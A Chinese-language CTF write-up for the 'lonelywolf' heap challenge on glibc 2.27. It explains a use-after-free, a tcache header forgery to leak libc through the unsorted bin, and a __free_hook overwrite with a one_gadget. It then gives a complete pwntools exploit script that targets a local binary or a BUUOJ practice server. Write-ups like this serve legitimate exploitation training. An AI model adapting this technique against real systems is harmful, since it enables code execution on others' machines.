复现一下
程序分析:
保护全开
就是一个菜单类型,功能齐全
存在uaf,free后能edit,可以绕过2.27的tcache doublefree检测
值得注意的是最大申请0x78
利用思路:
一般我们要getshell肯定要改hook为system,og啥的,改hook就要得到libc基址,泄露libc基址要靠unsortbin,那申请最大0x78不是unsortbin范围咋整呢?
我们可以分配到tcache头的地址(堆的地址靠uaf泄露),把它0x250index改为7,它就会认为0x250tcache满了,释放这个0x250的堆就会到unsortbin了,就能泄露libc基址了(也是uaf)
那我们算出og,改hook为og就行了
exp:
from pwn import *
local_file = './lonelywolf'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
elif select == 1:
r = remote('node4.buuoj.cn',25904 )
libc = ELF(remote_libc)
else:
r = gdb.debug(local_file)
libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------------
def add(size):
sla('Your choice: ','1')
sla('Index: ','0')
sla('Size: ',str(size))
def edit(content):
sla('Your choice: ','2')
sla('Index: ','0')
sla('Content: ',content)
def show():
sla('Your choice: ','3')
sla('Index: ','0')
def delete():
sla('Your choice: ','4')
sla('Index: ','0')
#------------------------------
add(0x78)
delete()
edit('a'*0x8)
delete()
show()
ru('Content: ')
heap_base=uu64(rc(6))-0x260
info('heap_base',heap_base)
#------------------------------
edit(p64(heap_base+0x10))
add(0x78)
add(0x78)
payload=p8(0)*6+p8(1)+p8(0)*(0x25-9)+p8(7)
payload+=(0x50-0x4)*'\x00'
payload+=p64(0)
edit(payload)
delete()
show()
libc_base=uu64(ru('\x7f')[-6:])-libc.sym['__malloc_hook']-96-0x10
info('libc_base',libc_base)
og=[0x4f2a5,0x4f302,0xe54f7,0xe54fe,0xe5502,0x10a2fc,0x10a308]
malloc_hook=libc.sym['__malloc_hook']+libc_base
realloc_hook=libc.sym['__realloc_hook']+libc_base
free_hook=libc.sym['__free_hook']+libc_base
#------------------------------
add(0x78)
delete()
edit(p64(free_hook))
add(0x78)
add(0x78)
edit(p64(og[5]+libc_base))
delete()
#debug()
r.interactive()
one_gadget要变level 1:
one_gadget ./libc-2.27.so -l 1